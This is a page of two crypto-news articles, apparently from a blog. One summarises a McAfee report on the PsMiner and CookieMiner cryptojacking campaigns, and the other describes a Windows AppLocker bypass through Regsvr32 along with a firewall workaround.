Srp 30

Cryptojacking Campaigns Rose 29% in Q1, McAfee Says

In the first quarter of 2019, cryptojacking campaigns aimed at victims’ PCs to mine cryptocurrencies rose 29%, according to a recent report by security software provider McAfee.


Hackers Target Windows PCs to Mine Monero

The antivirus maker founded by crypto fan John McAfee discovered that both Windows and Apple ecosystems are equally vulnerable to cryptojacking campaigns.

Most of the mining attacks on Windows computers use PowerShell for propagation and execution. The latter is a task automation engine and interactive Command-Line Interface (CLI) created by Microsoft for system administration and configuration management.

In the first quarter, one of the most significant crypto malware campaigns discovered by McAfee was PsMiner. Hackers have been using a Trojan to distribute the mining worm. The malware is designed to mine Monero by exploiting the vulnerabilities in servers running Hadoop, ElasticSearch, Weblogic, Redis, SqlServer, Spring, and ThinkPHP.

Monero (XMR) is a cryptocurrency that allows users to make peer-to-peer transactions anonymously without being traced even by their addresses. The coin is among 15 largest cryptocurrencies by market cap. As of August 30, it boasts a capitalization of $1.15 billion. Monero is attractive for miners thanks to its generous reward potential. Also, XMR miners don’t have to use expensive GPUs and ASIC systems as in the case of Bitcoin.

Back to PsMiner, it reaches the victim’s computer by a PowerShell command that downloads the WindowsUpdate.ps1 payload, the McAfee report says.

McAfee Report Says Apple Devices Are Vulnerable Too

Besides PsMiner, another malware family, called CookieMiner, has been attacking macOS devices and sharing code with a past campaign to steal digital wallets and credentials. The malware used EmPyre backdoor to automate the stealing process.

McAfee found that CookieMiner stole data from popular crypto exchanges, including Binance, Coinbase, Bitstamp, Poloniex, Bittrex, and MyEtherWallet. The malware got access to data like passwords to access the crypto exchanges’ sites. However, the main goal was to infect computers to mine Koto.

In general, ransomware attacks rose 118% over the first quarter, the report says. There are new ransomware families, while hackers use innovative techniques. Even so, hackers still need victims’ involuntary cooperation. McAfee concluded:

“Even with all the sophisticated attack techniques being developed, attackers are still highly dependent on human interaction and social engineering.”

Do you think hacking attacks represent one of the most significant problems for the crypto space? Share your thoughts below!


Images via Shutterstock

The Rundown

Share
Dub 25

AppLocker Vulnerability Creates Enterprise Malware Threats

Source: bitcoin

Bitcoinist_Security Vulnerability

Several versions of Microsoft Windows had an extra feature – called AppLocker – for business-minded users to blacklist or whitelist particular applications. This should reduce the risk of being infected with malware or virii, but the feature can rather easily be bypassed by the look of things.

Also read: Industry Report: Kraken, Others Receive Large Investments

Bypassing Windows AppLocker With Relative Ease

Windows is often targeted by Internet criminals all over the world, as it is the most popular operating systems across computers and some tablets. Given the recent increase in crypto-ransomware threats, it only seems normal most of these malware infections occur when Windows machines are involved, and it looks like the threat is far from over.

The AppLocker security features found in business-focused versions of Microsoft Windows can easily be disabled by making a small change to the computer register. Although most enterprises use this feature to restrict application usage and access in an attempt to prevent malware infections, it looks like they will have to find alternative solutions.

A recent study by security researcher Casey Smith shows how AppLocker is vulnerable to an exploit that will actually disable this checking procedure. Granted, the computer itself would need to have modifications made by Regsvr32, so it points to a remotely hosted file, but doing so would let systems run just about any application in the world.

Unfortunately, there is no patch to address this vulnerability just yet, although Windows users can rest assured Microsoft is well aware of this situation. One temporary solution enterprises could make use of is by letting Windows Firewall block Regsvr32, preventing it from accessing any online file. For companies dealing with dozens of computer son their network, this is far from a perfect solution, though.

Until this AppLocker flaw can be fixed, hackers and Internet criminals will be able to exploit this vulnerability and target enterprises with all kinds of malware. It is not unlikely we will see more crypto-ransomware infections in the coming weeks. Given the stealthy nature of this alteration to Regsvr32, there is hardly a way to detect these changes either, as no administrator access is required to do so.

Are you using AppLocker, and if so, are you concerned about this vulnerability? Let us know in the comments below!

Source: Engadget

Images courtesy of Microsoft Windows, Shutterstock

The post AppLocker Vulnerability Creates Enterprise Malware Threats appeared first on Bitcoinist.net.

AppLocker Vulnerability Creates Enterprise Malware Threats

Share